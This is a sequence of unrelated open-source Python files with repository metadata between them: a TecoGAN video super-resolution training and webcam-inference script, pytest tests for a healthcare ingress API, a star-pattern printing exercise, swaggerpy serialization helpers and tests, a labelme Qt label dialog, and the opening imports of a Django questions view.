"--output_dir", desstr,
"--summary_dir", desstr,
"--mode","inference",
"--num_resblock", "%d"%FLAGS.num_resblock,
"--checkpoint", os.path.join(FLAGS.output_dir, 'model-%d'%testno),
"--cudaID", FLAGS.cudaID]
# a folder for short test
cmd1 += ["--input_dir_LR", "./LR/calendar/", # update the testing sequence
"--output_pre", "", # saving in train folder directly
"--output_name", "%09d"%testno, # name
"--input_dir_len", "10",]
print('[testWhileTrain] step %d:'%testno)
print(' '.join(cmd1))
# ignore signals
return subprocess.Popen(cmd1, preexec_fn = preexec)
if False: # If you want to take a look of the configuration, True
print_configuration_op(FLAGS)
##############################################################################################
# the inference mode (just perform super resolution on the input image)
if FLAGS.mode == 'inference':
if FLAGS.checkpoint is None:
raise ValueError('The checkpoint file is needed to performing the test.')
# Declare the test data reader
cap=cv.VideoCapture(0)
fps = cap.get(cv.CAP_PROP_FPS)
cap.set(cv.CAP_PROP_FRAME_WIDTH, 360)
cap.set(cv.CAP_PROP_FRAME_HEIGHT, 240)
frame = cap.read()
if cap.isOpened():
width = cap.get(3)
height = cap.get(4)
inference_data = inference_data_loader(FLAGS)
#input_shape = [1,] + list(inference_data.inputs[0].shape)
input_shape = [1, int(height),int(width),3] # N H W C
output_shape = [1,input_shape[1]*4, input_shape[2]*4, 3]
oh = input_shape[1] - input_shape[1]//8 * 8
ow = input_shape[2] - input_shape[2]//8 * 8
paddings = tf.constant([[0,0], [0,oh], [0,ow], [0,0]])
print("input shape:", input_shape)
print("output shape:", output_shape)
# build the graph
inputs_raw = tf.placeholder(tf.float32, shape=input_shape, name='inputs_raw')
pre_inputs = tf.Variable(tf.zeros(input_shape), trainable=False, name='pre_inputs')
pre_gen = tf.Variable(tf.zeros(output_shape), trainable=False, name='pre_gen')
pre_warp = tf.Variable(tf.zeros(output_shape), trainable=False, name='pre_warp')
transpose_pre = tf.space_to_depth(pre_warp, 4)
inputs_all = tf.concat( (inputs_raw, transpose_pre), axis = -1)
with tf.variable_scope('generator'):
gen_output = generator_F(inputs_all, 3, reuse=False, FLAGS=FLAGS)
# Deprocess the images outputed from the model, and assign things for next frame
with tf.control_dependencies([ tf.assign(pre_inputs, inputs_raw)]):
outputs = tf.assign(pre_gen, deprocess(gen_output))
inputs_frames = tf.concat( (pre_inputs, inputs_raw), axis = -1)
with tf.variable_scope('fnet'):
gen_flow_lr = fnet( inputs_frames, reuse=False)
gen_flow_lr = tf.pad(gen_flow_lr, paddings, "SYMMETRIC")
gen_flow = upscale_four(gen_flow_lr*4.0)
gen_flow.set_shape( output_shape[:-1]+[2] )
pre_warp_hi = tf.contrib.image.dense_image_warp(pre_gen, gen_flow)
before_ops = tf.assign(pre_warp, pre_warp_hi)
print('Finish building the network')
# In inference time, we only need to restore the weight of the generator
var_list = tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope='generator')
var_list = var_list + tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope='fnet')
weight_initiallizer = tf.train.Saver(var_list)
# Define the initialization operation
init_op = tf.global_variables_initializer()
local_init_op = tf.local_variables_initializer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
if (FLAGS.output_pre == ""):
image_dir = FLAGS.output_dir
else:
image_dir = os.path.join(FLAGS.output_dir, FLAGS.output_pre)
if not os.path.exists(image_dir):
os.makedirs(image_dir)
numMonitorX = 2
numMonitorY = 2
with tf.Session(config=config) as sess:
# Load the pretrained model
sess.run(init_op)
sess.run(local_init_op)
print('Loading weights from ckpt model')
weight_initiallizer.restore(sess, FLAGS.checkpoint)
if False: # If you want to take a look of the weights, True
printVariable('generator')
print('Frame evaluation starts!!')
while(cap.isOpened()):
start = time.time()
ret , frame = cap.read()
#input_im = np.array(frame.astype(np.float32))
frame =frame/ 255.0 #np.max(frame)
input_im = np.expand_dims(frame.astype(np.float32),axis=0)
feed_dict={inputs_raw: input_im}
sess.run(before_ops, feed_dict=feed_dict)
output_frame = sess.run(outputs, feed_dict=feed_dict)
end = time.time()
seconds = end - start
cv.putText(output_frame[0],str(fps*seconds),(10,40),cv.FONT_HERSHEY_SIMPLEX,1, (0, 255, 255), 1, cv.LINE_AA)
cv.imshow("runtime result", output_frame[0])
frame = cv.resize(frame, (4* int(width), 4* int(height)), interpolation=cv.INTER_CUBIC)
cv.imshow("runtime src", frame)
if cv.waitKey(1) &0xFF ==ord('q'):
break
#print( "total time " + str(srtime) + ", frame number " + str(max_iter) )
###############################################################################################
# The training mode
elif FLAGS.mode == 'train':
# hard coded save
filelist = ['main.py','lib/Teco.py','lib/frvsr.py','lib/dataloader.py','lib/ops.py']
for filename in filelist:
shutil.copyfile('./' + filename, FLAGS.summary_dir + filename.replace("/","_"))
useValidat = tf.placeholder_with_default( tf.constant(False, dtype=tf.bool), shape=() )
rdata = frvsr_gpu_data_loader(FLAGS, useValidat)
# Data = collections.namedtuple('Data', 'paths_HR, s_inputs, s_targets, image_count, steps_per_epoch')
print('tData count = %d, steps per epoch %d' % (rdata.image_count, rdata.steps_per_epoch))
if (FLAGS.ratio>0):
Net = TecoGAN( rdata.s_inputs, rdata.s_targets, FLAGS )
else:
Net = FRVSR( rdata.s_inputs, rdata.s_targets, FLAGS )
# Network = collections.namedtuple('Network', 'gen_output, train, learning_rate, update_list, '
# 'update_list_name, update_list_avg, image_summary')
# Add scalar summary
tf.summary.scalar('learning_rate', Net.learning_rate)
train_summary = []
for key, value in zip(Net.update_list_name, Net.update_list_avg):
# 'map_loss, scale_loss, FrameA_loss, FrameA_loss,...'
train_summary += [tf.summary.scalar(key, value)]
train_summary += Net.image_summary
merged = tf.summary.merge(train_summary)
validat_summary = [] # val data statistics is not added to average
uplen = len(Net.update_list)
for key, value in zip(Net.update_list_name[:uplen], Net.update_list):
# 'map_loss, scale_loss, FrameA_loss, FrameA_loss,...'
validat_summary += [tf.summary.scalar("val_" + key, value)]
val_merged = tf.summary.merge(validat_summary)
# Define the saver and weight initiallizer
saver = tf.train.Saver(max_to_keep=50)
# variable lists
all_var_list = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
tfflag = tf.GraphKeys.MODEL_VARIABLES #tf.GraphKeys.TRAINABLE_VARIABLES
if (FLAGS.checkpoint is not None) and (FLAGS.pre_trained_model is True):
model_var_list = tf.get_collection(tfflag, scope='generator') + tf.get_collection(tfflag, scope='fnet')
assign_ops = get_existing_from_ckpt(FLAGS.checkpoint, model_var_list, rest_zero=True, print_level=1)
print('Prepare to load %d weights from the pre-trained model for generator and fnet'%len(assign_ops))
if FLAGS.ratio>0:
model_var_list = tf.get_collection(tfflag, scope='tdiscriminator')
dis_list = get_existing_from_ckpt(FLAGS.checkpoint, model_var_list, print_level=0)
print('Prepare to load %d weights from the pre-trained model for discriminator'%len(dis_list))
assign_ops += dis_list
if FLAGS.vgg_scaling > 0.0: # VGG weights are not trainable
vgg_var_list = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='vgg_19')
vgg_restore = tf.train.Saver(vgg_var_list)
print('Finish building the network.')
# Start the session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
# init_op = tf.initialize_all_variables() # MonitoredTrainingSession will initialize automatically
with tf.train.MonitoredTrainingSession(config=config, save_summaries_secs=None, save_checkpoint_secs=None) as sess:
train_writer = tf.summary.FileWriter(FLAGS.summary_dir, sess.graph)
printVariable('generator')
printVariable('fnet')
if FLAGS.ratio>0:
printVariable('tdiscriminator')
if FLAGS.vgg_scaling > 0.0:
printVariable('vgg_19', tf.GraphKeys.GLOBAL_VARIABLES)
vgg_restore.restore(sess, FLAGS.vgg_ckpt)
print('VGG19 restored successfully!!')
if (FLAGS.checkpoint is not None):
if (FLAGS.pre_trained_model is False):
print('Loading everything from the checkpoint to continue the training...')
saver.restore(sess, FLAGS.checkpoint)
# this will restore everything, including ADAM training parameters and global_step
else:
print('Loading weights from the pre-trained model to start a new training...')
sess.run(assign_ops) # only restore existing model weights
print('The first run takes longer time for training data loading...')
# get the session for save
_sess = sess
while type(_sess).__name__ != 'Session':
# pylint: disable=W0212
_sess = _sess._sess
save_sess = _sess
if 1:
print('Save initial checkpoint, before any training')
init_run_no = sess.run(Net.global_step)
saver.save(save_sess, os.path.join(FLAGS.output_dir, 'model'), global_step=init_run_no)
testWhileTrain(FLAGS, init_run_no) # make sure that testWhileTrain works
# Performing the training
frame_len = (FLAGS.RNN_N*2-1) if FLAGS.pingpang else FLAGS.RNN_N
max_iter, step, start = FLAGS.max_iter, 0, time.time()
if max_iter is None:
if FLAGS.max_epoch is None:
raise ValueError('one of max_epoch or max_iter should be provided')
else:
max_iter = FLAGS.max_epoch * rdata.steps_per_epoch
try:
for step in range(max_iter):
run_step = sess.run(Net.global_step) + 1
fetches = { "train": Net.train, "learning_rate": Net.learning_rate }
if (run_step % FLAGS.display_freq) == 0:
for key, value in zip(Net.update_list_name, Net.update_list_avg):
fetches[str(key)] = value
if (run_step % FLAGS.summary_freq) == 0:
fetches["summary"] = merged
results = sess.run(fetches)
if(step == 0):
print('Optimization starts!!!(Ctrl+C to stop, will try saving the last model...)')
if (run_step % FLAGS.summary_freq) == 0:
print('Run and Recording summary!!')
train_writer.add_summary(results['summary'], run_step)
val_fetches = {}
for name, value in zip(Net.update_list_name[:uplen], Net.update_list):
val_fetches['val_' + name] = value
val_fetches['summary'] = val_merged
val_results = sess.run(val_fetches, feed_dict={useValidat: True})
train_writer.add_summary(val_results['summary'], run_step)
print('-----------Validation data scalars-----------')
for name in Net.update_list_name[:uplen]:
print('val_' + name, val_results['val_' + name])
if (run_step % FLAGS.display_freq) == 0:
train_epoch = math.ceil(run_step / rdata.steps_per_epoch)
train_step = (run_step - 1) % rdata.steps_per_epoch + 1
rate = (step + 1) * FLAGS.batch_size / (time.time() - start)
remaining = (max_iter - step) * FLAGS.batch_size / rate
print("progress epoch %d step %d image/sec %0.1fx%02d remaining %dh%dm" %
(train_epoch, train_step, rate, frame_len,
remaining // 3600, (remaining%3600) // 60))
print("global_step", run_step)
print("learning_rate", results['learning_rate'])
for name in Net.update_list_name:
print(name, results[name])
if (run_step % FLAGS.save_freq) == 0:
print('Save the checkpoint')
saver.save(save_sess, os.path.join(FLAGS.output_dir, 'model'), global_step=int(run_step))
testWhileTrain(FLAGS, run_step)
except KeyboardInterrupt:
if step > 1:
print('main.py: KeyboardInterrupt->saving the checkpoint')
saver.save(save_sess, os.path.join(FLAGS.output_dir, 'model'), global_step=int(run_step))
testWhileTrain(FLAGS, run_step).communicate()
print('main.py: quit')
exit()
print('Optimization done!!!!!!!!!!!!')
| 48.940133
| 120
| 0.653181
|
4a0ead8d2f771422a5baabc7ea892499687bc7c0
| 5,461
|
py
|
Python
|
tests/routes/test_ingress.py
|
LinuxForHealth/connect
|
0bb2edc2923633c68b3247006abe98001605adbd
|
[
"Apache-2.0"
] | 33
|
2020-06-16T11:47:03.000Z
|
2022-03-24T02:41:00.000Z
|
tests/routes/test_ingress.py
|
LinuxForHealth/connect
|
0bb2edc2923633c68b3247006abe98001605adbd
|
[
"Apache-2.0"
] | 470
|
2020-06-12T01:18:43.000Z
|
2022-02-20T23:08:00.000Z
|
tests/routes/test_ingress.py
|
LinuxForHealth/connect
|
0bb2edc2923633c68b3247006abe98001605adbd
|
[
"Apache-2.0"
] | 30
|
2020-06-12T19:36:09.000Z
|
2022-01-31T15:25:35.000Z
|
import pytest
from connect.clients import kafka, nats
from connect.config import get_settings
from connect.workflows.core import CoreWorkflow
from unittest.mock import AsyncMock
@pytest.mark.parametrize(
"fixture_name,data_format",
[
("x12_fixture", "X12-005010"),
("fhir_fixture", "FHIR-R4"),
("hl7_fixture", "HL7-V2"),
],
)
@pytest.mark.asyncio
async def test_ingress_post(
fixture_name,
data_format,
request,
async_test_client,
mock_async_kafka_producer,
monkeypatch,
settings,
):
"""
Parameterized /ingress [POST] test with X12, FHIR, and HL7 inputs
:param fixture_name: The name of the pytest fixture used for parameterized testing.
:param data_format: The expected data format for the test case.
:param request: The pytest request fixture used to dynamically access test case fixtures
:param async_test_client: An async test client
:param mock_async_kafka_producer: Mock async kafka producer used to simulate messaging interactions
:param monkeypatch: The pytest monkeypatch fixture.
:param settings: Mocked connect configuration settings.
"""
fixture = request.getfixturevalue(fixture_name)
with monkeypatch.context() as m:
m.setattr(kafka, "ConfluentAsyncKafkaProducer", mock_async_kafka_producer)
m.setattr(CoreWorkflow, "synchronize", AsyncMock())
m.setattr(nats, "get_nats_client", AsyncMock(return_value=AsyncMock()))
m.setattr(nats, "get_jetstream_context", AsyncMock(return_value=AsyncMock()))
async with async_test_client as ac:
# remove external server setting
settings.connect_external_fhir_servers = []
ac._transport.app.dependency_overrides[get_settings] = lambda: settings
actual_response = await ac.post("/ingress", json={"data": fixture})
assert actual_response.status_code == 200
actual_json = actual_response.json()
assert actual_json["uuid"]
assert actual_json["operation"] == "POST"
assert actual_json["creation_date"]
assert actual_json["store_date"]
assert actual_json["consuming_endpoint_url"] == "/ingress"
assert actual_json["data"]
assert actual_json["data_format"] == data_format
assert actual_json["status"] == "success"
assert data_format in actual_json["data_record_location"]
assert actual_json["target_endpoint_urls"] == []
assert actual_json["ipfs_uri"] is None
assert actual_json["elapsed_storage_time"] > 0
assert actual_json["elapsed_storage_time"] > 0
assert actual_json["transmit_date"] is None
assert actual_json["elapsed_transmit_time"] is None
assert actual_json["elapsed_total_time"] > 0
assert actual_json["transmission_attributes"] is None
@pytest.mark.asyncio
async def test_ingress_post_422_error(
async_test_client, mock_async_kafka_producer, monkeypatch, settings, x12_fixture
):
"""
Parameterized /ingress [POST] test with X12, FHIR, and HL7 inputs
:param async_test_client: An async test client
:param mock_async_kafka_producer: Mock async kafka producer used to simulate messaging interactions
:param monkeypatch: The pytest monkeypatch fixture.
:param settings: Mocked connect configuration settings.
"""
invalid_x12 = x12_fixture.replace("ISA", "IPA")
async with async_test_client as ac:
# remove external server setting
settings.connect_external_fhir_servers = []
ac._transport.app.dependency_overrides[get_settings] = lambda: settings
actual_response = await ac.post("/ingress", json={"data": invalid_x12})
assert actual_response.status_code == 422
@pytest.mark.asyncio
async def test_edi_upload(
dicom_fixture,
tmpdir,
async_test_client,
mock_async_kafka_producer,
monkeypatch,
settings,
):
with monkeypatch.context() as m:
m.setattr(kafka, "ConfluentAsyncKafkaProducer", mock_async_kafka_producer)
m.setattr(CoreWorkflow, "synchronize", AsyncMock())
m.setattr(nats, "get_nats_client", AsyncMock(return_value=AsyncMock()))
m.setattr(nats, "get_jetstream_context", AsyncMock(return_value=AsyncMock()))
async with async_test_client as ac:
# remove external server setting
settings.connect_external_fhir_servers = []
ac._transport.app.dependency_overrides[get_settings] = lambda: settings
actual_response = await ac.post(
"/ingress/upload", files={"file": ("dcm_1.dcm", dicom_fixture)}
)
assert actual_response.status_code == 200
actual_json = actual_response.json()
assert actual_json["uuid"]
assert actual_json["operation"] == "POST"
assert actual_json["creation_date"]
assert actual_json["store_date"]
assert actual_json["consuming_endpoint_url"] == "/ingress/upload"
assert actual_json["data"]
assert actual_json["data_format"] == "DICOM"
assert actual_json["status"] == "success"
assert "DICOM" in actual_json["data_record_location"]
assert actual_json["target_endpoint_urls"] == []
assert actual_json["ipfs_uri"] is None
assert actual_json["elapsed_storage_time"] > 0
assert actual_json["elapsed_storage_time"] > 0
assert actual_json["transmit_date"] is None
assert actual_json["elapsed_transmit_time"] is None
assert actual_json["elapsed_total_time"] > 0
assert actual_json["transmission_attributes"] is None
| 40.154412
| 103
| 0.718733
|
4a0eadbff7ed2b42375232f7313b96c8b3e1ddde
| 546
|
py
|
Python
|
Symbols/reverse_triangle.py
|
Ashokkommi0001/patterns
|
daa1a1d8f3bc6e021e02a0e34458e2c178fc71d2
|
[
"MIT"
] | 2
|
2021-03-17T12:08:22.000Z
|
2021-03-17T12:11:10.000Z
|
Symbols/reverse_triangle.py
|
Ashokkommi0001/patterns
|
daa1a1d8f3bc6e021e02a0e34458e2c178fc71d2
|
[
"MIT"
] | null | null | null |
Symbols/reverse_triangle.py
|
Ashokkommi0001/patterns
|
daa1a1d8f3bc6e021e02a0e34458e2c178fc71d2
|
[
"MIT"
] | 1
|
2021-03-17T11:49:39.000Z
|
2021-03-17T11:49:39.000Z
|
def for_reverse_triangle():
for row in range(6):
for col in range(11):
if (row==0) or (row-col==0 or row+col==10):
print("*",end=" ")
else:
print(end=" ")
print()
def while_reverse_triangle():
row=0
while row<6:
col=0
while col<11:
if (row==0) or (row-col==0 or row+col==10):
print("*",end=" ")
else:
print(end=" ")
col+=1
row+=1
print()
| 24.818182
| 56
| 0.388278
|
4a0eae39d62adf3f8072c861b6dc9447f4cdf880
| 2,634
|
py
|
Python
|
src/ape/types/abstract.py
|
miohtama/ape
|
622deb25076d33de0edb3a23449ccdc04c3288cd
|
[
"Apache-2.0"
] | 210
|
2021-04-29T05:42:42.000Z
|
2022-03-31T15:50:17.000Z
|
src/ape/types/abstract.py
|
miohtama/ape
|
622deb25076d33de0edb3a23449ccdc04c3288cd
|
[
"Apache-2.0"
] | 370
|
2021-04-29T01:54:32.000Z
|
2022-03-31T19:19:29.000Z
|
src/ape/types/abstract.py
|
miohtama/ape
|
622deb25076d33de0edb3a23449ccdc04c3288cd
|
[
"Apache-2.0"
] | 25
|
2021-04-29T05:08:50.000Z
|
2022-03-11T20:43:56.000Z
|
import json
from copy import deepcopy
from pathlib import Path
from typing import Any, Dict, Optional, Set, Union
import dataclassy as dc
def update_params(params, param_name, param_type):
if param_name in params and params[param_name]:
params[param_name] = param_type.from_dict(params[param_name])
def update_list_params(params, param_name, param_type):
if param_name in params and params[param_name]:
params[param_name] = [param_type.from_dict(p) for p in params[param_name]]
def update_dict_params(params, param_name, param_type):
if param_name in params and params[param_name]:
for key in params[param_name]:
params[param_name][key] = param_type.from_dict(params[param_name][key])
def remove_empty_fields(data, keep_fields: Optional[Set[str]] = None):
if isinstance(data, dict):
return {
k: v
for k, v in zip(data.keys(), map(remove_empty_fields, data.values()))
if isinstance(v, bool) or (keep_fields and k in keep_fields) or v
}
elif isinstance(data, list):
return [v for v in map(remove_empty_fields, data) if isinstance(v, bool) or v]
return data
def to_dict(v: Any) -> Optional[Union[list, dict, str, int, bool]]:
if isinstance(v, SerializableType):
return v.to_dict()
elif isinstance(v, list):
return [to_dict(i) for i in v] # type: ignore
elif isinstance(v, dict):
return {k: to_dict(i) for k, i in v.items()}
elif isinstance(v, (str, int, bool)) or v is None:
return v
else:
raise ValueError(f"Unhandled type '{type(v)}'.")
@dc.dataclass(slots=True, kwargs=True, repr=True)
class SerializableType:
_keep_fields_: Set[str] = set()
_skip_fields_: Set[str] = set()
def to_dict(self) -> Dict:
data = {
k: to_dict(v)
for k, v in dc.values(self).items()
if not (k.startswith("_") or k in self._skip_fields_)
}
return remove_empty_fields(data, keep_fields=self._keep_fields_)
@classmethod
def from_dict(cls, params: Dict):
params = deepcopy(params)
return cls(**params) # type: ignore
class FileMixin(SerializableType):
@classmethod
def from_file(cls, path: Path):
with path.open("r") as f:
return cls.from_dict(json.load(f))
def to_file(self, path: Path):
# NOTE: EIP-2678 specifies document *must* be tightly packed
# NOTE: EIP-2678 specifies document *must* have sorted keys
with path.open("w") as f:
json.dump(self.to_dict(), f, indent=4, sort_keys=True)
| 30.627907
| 86
| 0.647684
|
4a0eaecdfc4c1d8218441b30616099ae43d2439c
| 8,150
|
py
|
Python
|
labelme/labelme/widgets/label_dialog.py
|
acejo2208/Drone_Segmentation
|
0f2abebc4e6e209bb6f02d8ab642134a6431f526
|
[
"Apache-2.0"
] | 2
|
2021-07-21T09:19:15.000Z
|
2021-07-22T00:29:43.000Z
|
labelme/labelme/widgets/label_dialog.py
|
acejo2208/Drone_Segmentation
|
0f2abebc4e6e209bb6f02d8ab642134a6431f526
|
[
"Apache-2.0"
] | null | null | null |
labelme/labelme/widgets/label_dialog.py
|
acejo2208/Drone_Segmentation
|
0f2abebc4e6e209bb6f02d8ab642134a6431f526
|
[
"Apache-2.0"
] | 1
|
2021-07-21T09:19:26.000Z
|
2021-07-21T09:19:26.000Z
|
import re
from qtpy import QT_VERSION
from qtpy import QtCore
from qtpy import QtGui
from qtpy import QtWidgets
from labelme.logger import logger
import labelme.utils
QT5 = QT_VERSION[0] == "5"
# TODO(unknown):
# - Calculate optimal position so as not to go out of screen area.
class LabelQLineEdit(QtWidgets.QLineEdit):
def setListWidget(self, list_widget):
self.list_widget = list_widget
def keyPressEvent(self, e):
if e.key() in [QtCore.Qt.Key_Up, QtCore.Qt.Key_Down]:
self.list_widget.keyPressEvent(e)
else:
super(LabelQLineEdit, self).keyPressEvent(e)
class LabelDialog(QtWidgets.QDialog):
def __init__(
self,
text="Enter object label",
parent=None,
labels=None,
sort_labels=True,
show_text_field=True,
completion="startswith",
fit_to_content=None,
flags=None,
):
if fit_to_content is None:
fit_to_content = {"row": False, "column": True}
self._fit_to_content = fit_to_content
super(LabelDialog, self).__init__(parent)
self.edit = LabelQLineEdit()
self.edit.setPlaceholderText(text)
self.edit.setValidator(labelme.utils.labelValidator())
self.edit.editingFinished.connect(self.postProcess)
if flags:
self.edit.textChanged.connect(self.updateFlags)
self.edit_group_id = QtWidgets.QLineEdit()
self.edit_group_id.setPlaceholderText("Group ID")
self.edit_group_id.setValidator(
QtGui.QRegExpValidator(QtCore.QRegExp(r"\d*"), None)
)
layout = QtWidgets.QVBoxLayout()
if show_text_field:
layout_edit = QtWidgets.QHBoxLayout()
layout_edit.addWidget(self.edit, 6)
layout_edit.addWidget(self.edit_group_id, 2)
layout.addLayout(layout_edit)
# buttons
self.buttonBox = bb = QtWidgets.QDialogButtonBox(
QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel,
QtCore.Qt.Horizontal,
self,
)
bb.button(bb.Ok).setIcon(labelme.utils.newIcon("done"))
bb.button(bb.Cancel).setIcon(labelme.utils.newIcon("undo"))
bb.accepted.connect(self.validate)
bb.rejected.connect(self.reject)
layout.addWidget(bb)
# label_list
self.labelList = QtWidgets.QListWidget()
if self._fit_to_content["row"]:
self.labelList.setHorizontalScrollBarPolicy(
QtCore.Qt.ScrollBarAlwaysOff
)
if self._fit_to_content["column"]:
self.labelList.setVerticalScrollBarPolicy(
QtCore.Qt.ScrollBarAlwaysOff
)
self._sort_labels = sort_labels
if labels:
self.labelList.addItems(labels)
if self._sort_labels:
self.labelList.sortItems()
else:
self.labelList.setDragDropMode(
QtWidgets.QAbstractItemView.InternalMove
)
self.labelList.currentItemChanged.connect(self.labelSelected)
self.labelList.itemDoubleClicked.connect(self.labelDoubleClicked)
self.edit.setListWidget(self.labelList)
layout.addWidget(self.labelList)
# label_flags
if flags is None:
flags = {}
self._flags = flags
self.flagsLayout = QtWidgets.QVBoxLayout()
self.resetFlags()
layout.addItem(self.flagsLayout)
self.edit.textChanged.connect(self.updateFlags)
self.setLayout(layout)
# completion
completer = QtWidgets.QCompleter()
if not QT5 and completion != "startswith":
logger.warn(
"completion other than 'startswith' is only "
"supported with Qt5. Using 'startswith'"
)
completion = "startswith"
if completion == "startswith":
completer.setCompletionMode(QtWidgets.QCompleter.InlineCompletion)
# Default settings.
# completer.setFilterMode(QtCore.Qt.MatchStartsWith)
elif completion == "contains":
completer.setCompletionMode(QtWidgets.QCompleter.PopupCompletion)
completer.setFilterMode(QtCore.Qt.MatchContains)
else:
raise ValueError("Unsupported completion: {}".format(completion))
completer.setModel(self.labelList.model())
self.edit.setCompleter(completer)
def addLabelHistory(self, label):
if self.labelList.findItems(label, QtCore.Qt.MatchExactly):
return
self.labelList.addItem(label)
if self._sort_labels:
self.labelList.sortItems()
def labelSelected(self, item):
self.edit.setText(item.text())
def validate(self):
text = self.edit.text()
if hasattr(text, "strip"):
text = text.strip()
else:
text = text.trimmed()
if text:
self.accept()
def labelDoubleClicked(self, item):
self.validate()
def postProcess(self):
text = self.edit.text()
if hasattr(text, "strip"):
text = text.strip()
else:
text = text.trimmed()
self.edit.setText(text)
def updateFlags(self, label_new):
# keep state of shared flags
flags_old = self.getFlags()
flags_new = {}
for pattern, keys in self._flags.items():
if re.match(pattern, label_new):
for key in keys:
flags_new[key] = flags_old.get(key, False)
self.setFlags(flags_new)
def deleteFlags(self):
for i in reversed(range(self.flagsLayout.count())):
item = self.flagsLayout.itemAt(i).widget()
self.flagsLayout.removeWidget(item)
item.setParent(None)
def resetFlags(self, label=""):
flags = {}
for pattern, keys in self._flags.items():
if re.match(pattern, label):
for key in keys:
flags[key] = False
self.setFlags(flags)
def setFlags(self, flags):
self.deleteFlags()
for key in flags:
item = QtWidgets.QCheckBox(key, self)
item.setChecked(flags[key])
self.flagsLayout.addWidget(item)
item.show()
def getFlags(self):
flags = {}
for i in range(self.flagsLayout.count()):
item = self.flagsLayout.itemAt(i).widget()
flags[item.text()] = item.isChecked()
return flags
def getGroupId(self):
group_id = self.edit_group_id.text()
if group_id:
return int(group_id)
return None
def popUp(self, text=None, move=True, flags=None, group_id=None):
if self._fit_to_content["row"]:
self.labelList.setMinimumHeight(
self.labelList.sizeHintForRow(0) * self.labelList.count() + 2
)
if self._fit_to_content["column"]:
self.labelList.setMinimumWidth(
self.labelList.sizeHintForColumn(0) + 2
)
# if text is None, the previous label in self.edit is kept
if text is None:
text = self.edit.text()
if flags:
self.setFlags(flags)
else:
self.resetFlags(text)
self.edit.setText(text)
self.edit.setSelection(0, len(text))
if group_id is None:
self.edit_group_id.clear()
else:
self.edit_group_id.setText(str(group_id))
items = self.labelList.findItems(text, QtCore.Qt.MatchFixedString)
if items:
if len(items) != 1:
logger.warning("Label list has duplicate '{}'".format(text))
self.labelList.setCurrentItem(items[0])
row = self.labelList.row(items[0])
self.edit.completer().setCurrentRow(row)
self.edit.setFocus(QtCore.Qt.PopupFocusReason)
if move:
self.move(QtGui.QCursor.pos())
if self.exec_():
return self.edit.text(), self.getFlags(), self.getGroupId()
else:
return None, None, None
| 34.100418
| 78
| 0.600245
|
4a0eaf8eb3fd7655dd1335902f6d81f9e5885f7d
| 656
|
py
|
Python
|
src/jose/tests/test_utils.py
|
hdknr/jose
|
d872407e9f3b3a0262e6bb1cdb599b5c4c1d9ee4
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
src/jose/tests/test_utils.py
|
hdknr/jose
|
d872407e9f3b3a0262e6bb1cdb599b5c4c1d9ee4
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2015-01-23T09:37:17.000Z
|
2015-01-23T09:37:17.000Z
|
src/jose/tests/test_utils.py
|
hdknr/jose
|
d872407e9f3b3a0262e6bb1cdb599b5c4c1d9ee4
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
# -*- coding: utf-8 -*-
import unittest
from jose.utils import base64
class TestBase64(unittest.TestCase):
def test_base64(self):
'''
nose2 jose.tests.test_utils.TestBase64.test_base64
'''
self.assertEquals('QWxpY2U', base64.base64url_encode('Alice'))
self.assertEquals('Qm9i', base64.base64url_encode('Bob'))
self.assertEquals('Alice', base64.base64url_decode('QWxpY2U'))
self.assertEquals('Bob', base64.base64url_decode('Qm9i'))
self.assertEquals(
'=',
base64.base64url_decode(base64.base64url_encode('=')))
if __name__ == '__main__':
unittest.main()
| 26.24
| 70
| 0.644817
|
4a0eb0275eee12c2ffa3cb47273e2b69f1958b76
| 1,213
|
py
|
Python
|
swaggerpy3_test/loader_test.py
|
darrensessions/swaggerpy3
|
6c41533652c314ca58d420414e62c18f112fc11e
|
[
"BSD-3-Clause"
] | 1
|
2020-06-24T22:44:43.000Z
|
2020-06-24T22:44:43.000Z
|
swaggerpy3_test/loader_test.py
|
darrensessions/swaggerpy3
|
6c41533652c314ca58d420414e62c18f112fc11e
|
[
"BSD-3-Clause"
] | null | null | null |
swaggerpy3_test/loader_test.py
|
darrensessions/swaggerpy3
|
6c41533652c314ca58d420414e62c18f112fc11e
|
[
"BSD-3-Clause"
] | 2
|
2020-03-28T21:09:32.000Z
|
2021-08-06T08:00:47.000Z
|
#!/usr/bin/env python
#
# Copyright (c) 2013, Digium, Inc.
#
import unittest
import swaggerpy
from swaggerpy import swagger_model
class TestProcessor(swagger_model.SwaggerProcessor):
def process_resource_listing(self, resources, context):
resources['processed'] = True
class LoaderTest(unittest.TestCase):
def test_simple(self):
uut = swaggerpy.load_file('test-data/1.1/simple/resources.json')
self.assertEqual('1.1', uut['swaggerVersion'])
decl = uut['apis'][0]['api_declaration']
self.assertEqual(1, len(decl['models']))
self.assertEqual(1, len(decl['models']['Simple']['properties']))
def test_processor(self):
uut = swaggerpy.load_file('test-data/1.1/simple/resources.json',
processors=[TestProcessor()])
self.assertEqual('1.1', uut['swaggerVersion'])
self.assertTrue(uut['processed'])
def test_missing(self):
try:
swaggerpy.load_file(
'test-data/1.1/missing_resource/resources.json')
self.fail("Expected load failure b/c of missing file")
except IOError:
pass
if __name__ == '__main__':
unittest.main()
| 28.209302
| 72
| 0.635614
|
4a0eb0710160cc33152a75a9500bba4600f72537
| 2,802
|
py
|
Python
|
apps/questions/views.py
|
ressapanda/fishka-backend
|
c1eb58566dce01c7a011f0093893cd16b6d50875
|
[
"MIT"
] | null | null | null |
apps/questions/views.py
|
ressapanda/fishka-backend
|
c1eb58566dce01c7a011f0093893cd16b6d50875
|
[
"MIT"
] | null | null | null |
apps/questions/views.py
|
ressapanda/fishka-backend
|
c1eb58566dce01c7a011f0093893cd16b6d50875
|
[
"MIT"
] | null | null | null |
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import mixins, status
from rest_framework.decorators import action
from rest_framework.filters import OrderingFilter, SearchFilter
from rest_framework.request import Request
from rest_framework.response import Response
from rest_framework.viewsets import GenericViewSet
from apps.core.views import MultiSerializerMixin
from apps.questions.models import Question
